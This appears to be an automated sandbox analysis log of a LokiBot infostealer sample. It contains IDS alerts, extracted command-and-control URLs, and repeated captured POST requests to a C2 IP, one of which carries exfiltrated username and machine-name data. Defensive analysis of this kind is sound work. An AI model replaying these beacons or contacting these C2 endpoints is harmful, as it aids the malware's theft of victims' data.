                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49806 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49806 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49806 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49806 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49807 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49807 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49807 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49807 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49808 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49808 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49808 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49808 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49809 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49809 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49809 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49809 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49810 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49810 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49810 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49810 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49811 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49811 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49811 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49811 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49812 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49812 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49812 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49812 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49813 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49813 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49813 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49813 -> 45.77.223.48:80
                      Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                      Source: Malware configuration extractorURLs: http://45.77.223.48/~blog/?ajax=posts.php
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 176Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 176Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /~blog/?ajax=posts.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3E699C10Content-Length: 149Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 2_2_00404ED4 recv,2_2_00404ED4
